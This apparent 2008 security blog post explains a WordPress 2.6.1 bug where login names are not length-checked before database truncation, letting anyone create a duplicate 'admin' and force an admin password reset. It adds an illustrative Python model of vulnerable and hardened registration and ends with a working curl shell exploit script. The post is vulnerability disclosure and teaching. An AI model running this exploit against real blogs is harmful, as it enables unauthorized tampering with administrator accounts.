Update 09-08:
Quickly after posting this admin password resetter script I pulled the article,
since I found it is way too obvious how to completely take over the admin account based on this wordpress flaw.
But, since the info is finally out at milw0rm anyway
and the next step might not be as obvious as I thought - the publisher of that text
did not see it and even explicitly states this would be "not critical vuln"
- I might just as well go ahead and republish this old article.. :)
Looking at the source of php webapps usually is quite funny. Even when projects have been audited by a lot of people, in huge applications it is more or less impossible to rule out every unintended use of a function.
Take this example: wordpress is one of the most widely installed webapps worldwide, and there is probably little php code that has been audited by more people. Still, it remains possible to find things like the following within just a couple of minutes.
The following exploit might just lead to some trouble for a blog's admin: on a
blog which allows user registration, it allows anybody to quickly and very
easily reset the admin password - something which can usually only be achieved by the admin
confirming the reset request via mail.
Luckily only the true admin will receive the new password, so the direct impact is very
limited.
It is however possible - and actually rather easy - to take this one step further and
completely take over the admin account, locking the original admin out. I won't go into
details of that for the time being (this post is meant as an example
of a very widespread security vulnerability, namely the missing truncation of
overlong input strings, and not as an article about wordpress 0days).
The bug in wordpress in this case is that when registering a new user, the
length of the login name is not checked. This is a problem since the sql
table has a limit of 60 characters, so checking if 'admin
This is an incredibly common mistake in almost any php application you may happen to look into. Here it allows the
creation of a second 'admin' account - in this case you cannot log into it, but
that is not a general rule.
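To make the bug class concrete, here is an added example (not wordpress code) that models a user table whose login column is 60 characters wide: the vulnerable registration checks uniqueness on the raw, overlong input, while the hardened one rejects anything longer than the column and compares the way the database does. It assumes, as MySQL's padding collations do, that trailing spaces are ignored when values are compared.

```python
# Added example, not taken from wordpress. Models a wp_users-style table
# whose user_login column is VARCHAR(60): inserts are silently truncated
# and (assumed here, as with MySQL PAD SPACE collations) trailing spaces
# are ignored when two values are compared.
COLUMN_WIDTH = 60  # column width stated in the post


class UserTable:
    """Minimal stand-in for the users table."""

    def __init__(self):
        self.rows = []  # list of (user_login, email)

    @staticmethod
    def _db_key(login):
        # What the database effectively stores and compares.
        return login[:COLUMN_WIDTH].rstrip(" ")

    def find(self, login):
        key = self._db_key(login)
        return [r for r in self.rows if self._db_key(r[0]) == key]

    def insert(self, login, email):
        self.rows.append((login[:COLUMN_WIDTH], email))  # silent truncation


def register_vulnerable(table, login, email):
    """Uniqueness is checked on the raw input, which never matches 'admin'."""
    if any(r[0] == login for r in table.rows):
        return False
    table.insert(login, email)
    return True


def register_hardened(table, login, email):
    """Reject overlong names before the DB can truncate; compare like the DB."""
    login = login.strip()
    if not login or len(login) > COLUMN_WIDTH:
        return False
    if table.find(login):
        return False
    table.insert(login, email)
    return True


def demo():
    overlong = "admin" + " " * 60 + "x"  # constructed, same shape as in the post
    vuln, hard = UserTable(), UserTable()
    for t in (vuln, hard):
        t.insert("admin", "admin@example.invalid")
    created_vuln = register_vulnerable(vuln, overlong, "new@example.invalid")
    created_hard = register_hardened(hard, overlong, "new@example.invalid")
    # Returns: (created?, rows answering to "admin") for each variant.
    return created_vuln, len(vuln.find("admin")), created_hard, len(hard.find("admin"))
```

Running demo() shows the vulnerable table ending up with two rows that answer to a lookup of "admin", while the hardened one keeps a single row.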
Since this is a very common bug, I will release the quick exploit for educational purposes:
#!/bin/sh
# ez wpress admin-password resetter
# works w/ wordpress 2.6.1
# iso 2008
BLOG=$1
EMAIL=$2
CURL=/usr/bin/curl
if [ "X$EMAIL" = "X" ]; then
echo "[!] Usage: $0 blogurl myemail"
echo " fe: $0 http://31337.biz/blog ruler@31337.biz"
exit 1
fi
if [ -e $CURL ]; then
echo "[-] registering new admin user"
$CURL $BLOG/wp-login.php?action=register -s \
-d user_login="admin`perl -e 'print " "x60'`x" \
-d user_email=$EMAIL 2>&1 >/dev/null
echo "[x] done"
echo "[-] requesting password resetlink"
$CURL $BLOG/wp-login.php?action=lostpassword -s \
-d user_login=$EMAIL 2>&1 >/dev/null
cat <<SHIT
[x] done.
click on link in mail once to reset pass of real admin,
second click will reset your own password (you cannot login, though)
real admin will receive a notification-mail including the new password.
SHIT
fi
Although you should not really be able to do any damage with this script, you are not allowed to use it on any other blog than your own, for obvious reasons.